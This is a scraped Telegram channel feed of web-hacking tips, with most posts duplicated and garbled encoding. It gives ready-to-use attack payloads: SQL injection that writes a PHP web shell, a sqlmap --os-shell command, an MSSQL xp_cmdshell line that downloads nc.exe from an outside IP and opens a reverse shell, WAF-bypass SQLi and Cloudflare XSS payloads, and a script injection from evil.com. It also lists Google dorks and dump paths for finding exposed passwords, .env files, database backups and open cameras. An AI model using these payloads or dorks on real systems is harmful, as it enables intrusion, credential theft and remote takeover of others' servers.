๐ป Disclosed vulnerabilities with bug bounty
1๏ธโฃ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.
2๏ธโฃ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.
3๏ธโฃ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
1๏ธโฃ Account takeover via Self-XSS
An example of how additional functionality can be used to squeeze account takeover in one click from the useless Self XSS. See the report for more details.
2๏ธโฃ SQL injection in POST request
Identification and exploitation of Union-based SQL injection in POST request based on server responses. More information about exploitation of such vulnerabilities here.
3๏ธโฃ OTP Bypass
Bypassing OTP confirmation by manipulating the server response. I told you about such bugs here.
#web #xss #sqli
โค7๐3๐2
ุงุฏุฎููุง ุงูููุงุฉ ุฏู ุจุชูุดุฑ ู
ุญุชูู ุฑุงูู
https://t.me/wa3i_tech
https://t.me/wa3i_tech
https://t.me/wa3i_tech
https://t.me/wa3i_tech
https://t.me/wa3i_tech
https://t.me/wa3i_tech
Telegram
Wa3i | ูุนู
ู
ุฑุญุจุงู ุจู ูู ุฌุญูู
ุงููุนู
ุชูุฏุฑ ุชุดูู ุจุงูู ูููุงุชู ููุง @iiMrDarkChannels
ุชูุฏุฑ ุชุดูู ุจุงูู ูููุงุชู ููุง @iiMrDarkChannels
ExploitQuest
Photo
โโ๐ About bypassing protection against SQL injections
Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.
For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations
or by adding specific comments like
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
Often, the WAF on the site stifles all attempts to perform SQL injection and does not allow it's okay to insert a quotation mark and insert the usual payload, however, with some clever manipulations it is still often possible to bypass it.
For example, by adding control characters like %00 , %0A , etc. or by inserting mathematical operations
( 'AND'1'=1*1 instead of 'AND'1'='1' )
or by adding specific comments like
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
and much more.
For more examples, you can check out this repository, which shows bypass options for different situations, and I highly recommend this site.
https://websec.ca/kb/sql_injection
https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/
#web #sqli #bypass #waf
โค6๐ฅ3
๐ Forgotten database dumps
Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.
Here is a short but effective checklist to quickly check for forgotten database dumps.
Old database dumps can contain all sorts of interesting information - user credentials, configuration settings, API secrets and keys, customer data, and more.
Here is a short but effective checklist to quickly check for forgotten database dumps.
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
๐4โค1
dork:
intitle:"index of" "back.sql" OR "backup.sql" OR "accounts.sql" OR "backups.sql" OR "clients.sql" OR "customers.sql" OR "data.sql" OR "database.sql" OR "database.sqlite" OR "users.sql" OR "db.sql" OR "db.sqlite" OR "db_backup.sql" OR "dbase.sql" OR "dbdump.sql" OR "setup.sql" OR "sqldump.sql" OR "dump.sql" OR "mysql.sql" OR "sql.sql" OR "temp.sql"
๐4โค1
๐ Transition from SQL injection to shell or backdoor
โซ๏ธUse the โinto outfileโ command to write to a file:
โซ๏ธCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
โซ๏ธreverse netcat shell via mssql injection when xp_cmdshell is available:
#web #sqli
โซ๏ธUse the โinto outfileโ command to write to a file:
' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' #
โซ๏ธCapture the request in Burp Proxy and save it to the post-request file, then run sqlmap :
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
โซ๏ธreverse netcat shell via mssql injection when xp_cmdshell is available:
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
#web #sqli
๐ฅ4โค1
๐จ Getting other vulnerabilities when downloading a file
When testing file upload functionality in a web application, try setting the file name to the following values:
These payloads may introduce additional vulnerabilities.
#web
When testing file upload functionality in a web application, try setting the file name to the following values:
โซ๏ธ ../../../tmp/lol.png -> for Path Traversal vulnerability
โซ๏ธ sleep(10)-- -.jpg -> for SQL injection
โซ๏ธ <svg onload=alert(document.domain)>.jpg/png -> for XSS
โซ๏ธ ; sleep 10; -> for command injection
These payloads may introduce additional vulnerabilities.
#web
๐3๐3โค1
๐ A small selection of interesting Google dorks
โซ๏ธ FTP servers and sites
โซ๏ธLog files with passwords:
โซ๏ธConfiguration files with passwords:
โซ๏ธLists with email addresses:
โซ๏ธOpen cameras:
#web #google
โซ๏ธ FTP servers and sites
intitle:โindex ofโ inurl:ftp after:2018
โซ๏ธLog files with passwords:
allintext:password filetype:log after:2018
โซ๏ธConfiguration files with passwords:
filetype:env โDB_PASSWORDโ after:2018
โซ๏ธLists with email addresses:
filetype:xls inurl:โemail.xlsโ
โซ๏ธOpen cameras:
inurl:top.htm inurl:currenttime
#web #google
๐5โค3๐ฅ1
After exploiting sql injection using the following email address
you can't help but wonder: why the hell did this even get through as a valid email?
In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages โโdeviate a little from what characters can be used.
So, the next magic:
It will validate and legally return an email with the attack vector:
And how the developers display it further is a separate question.
#sqli
"'-sleep(5)-'"@mail.local
you can't help but wonder: why the hell did this even get through as a valid email?
In general, the local part (login, before @) of an email can contain special characters according to RFC, if it is enclosed in double quotes. And then - already beloved programming languages โโdeviate a little from what characters can be used.
So, the next magic:
php -r "echo filter_var('\"\'--><script/src=//evil.com></script>\"@example.com', FILTER_VALIDATE_EMAIL);โIt will validate and legally return an email with the attack vector:
"'--><script/src=//evil.com></script>"@example.com
And how the developers display it further is a separate question.
#sqli
๐ฅ5๐1
โ
๏ธ Bypass Cloudflare WAF
Payloads working at the time of publication for performing XSS on sites protected by Cloudflare WAF.
#web #xss
Payloads working at the time of publication for performing XSS on sites protected by Cloudflare WAF.
<img longdesc="src='x'onerror=alert(document.domain);//><img " src='showme'>
<img longdesc="src=" images="" stop.png"="" onerror="alert(document.domain);//&quot;" src="x" alt="showme">
#web #xss
โค4
Hacking with an image. PHP payload in an image.
The php-jpeg-injector tool can be used to attack web applications that run a .jpeg image through the PHP GD graphics library.
The tool creates a new .jpeg file with a PHP payload. The infected .jpeg file is executed via PHP's gd library. PHP interprets the payload injected into the jpeg and executes it.
#web
GitHub Link
The php-jpeg-injector tool can be used to attack web applications that run a .jpeg image through the PHP GD graphics library.
The tool creates a new .jpeg file with a PHP payload. The infected .jpeg file is executed via PHP's gd library. PHP interprets the payload injected into the jpeg and executes it.
#web
GitHub Link
โค3๐3
๐ Find SQL injection on the site with one command
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
#web #sqli
As always, a set of commands is used for these purposes.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Waybackurls retrieves all URLs that the Wayback Machine knows about identified live subdomains.
Anew will merge Findomain and Waybackurls output and remove duplicates.
Now we'll use gf to filter out URLs that match patterns with potential SQL injection (don't forget to install gf-patterns as well).
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
#web #sqli
๐11
โ Search for SSRF on a site with one command
To accomplish this task, we will use several utilities.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl.
Qsreplace takes URLs as input and replaces all query string values โโwith the value specified by the user.
After installing the above tools, simply run the following command:
Replace your.burpcollaborator.net with your server (or Burp Collaborator ) address
#web #ssrf
To accomplish this task, we will use several utilities.
Findomain collects the domains of the site being tested.
Httpx checks their availability.
Getallurls (gau) extracts known URLs from the AlienVault Open Threat Exchange, Wayback Machine, and Common Crawl.
Qsreplace takes URLs as input and replaces all query string values โโwith the value specified by the user.
After installing the above tools, simply run the following command:
findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace your.burpcollaborator.net
Replace your.burpcollaborator.net with your server (or Burp Collaborator ) address
#web #ssrf
๐6
๐ Find hidden parameters for IDOR search
When you encounter the following endpoints, try to look for hidden parameters as there is a high probability of encountering IDOR (Insecure Direct Object Reference):
To find hidden parameters you can use Arjun or fuzzparam .
https://github.com/0xsapra/fuzzparam
https://github.com/s0md3v/Arjun
Burpsuite has a param-miner extension for this purpose.
https://github.com/PortSwigger/param-miner
#web #IDOR@ExploitQuest
When you encounter the following endpoints, try to look for hidden parameters as there is a high probability of encountering IDOR (Insecure Direct Object Reference):
/settings/profile
/user/profile
/user/settings
/account/settings
/username
/profile
To find hidden parameters you can use Arjun or fuzzparam .
https://github.com/0xsapra/fuzzparam
https://github.com/s0md3v/Arjun
Burpsuite has a param-miner extension for this purpose.
https://github.com/PortSwigger/param-miner
#web #IDOR@ExploitQuest
๐5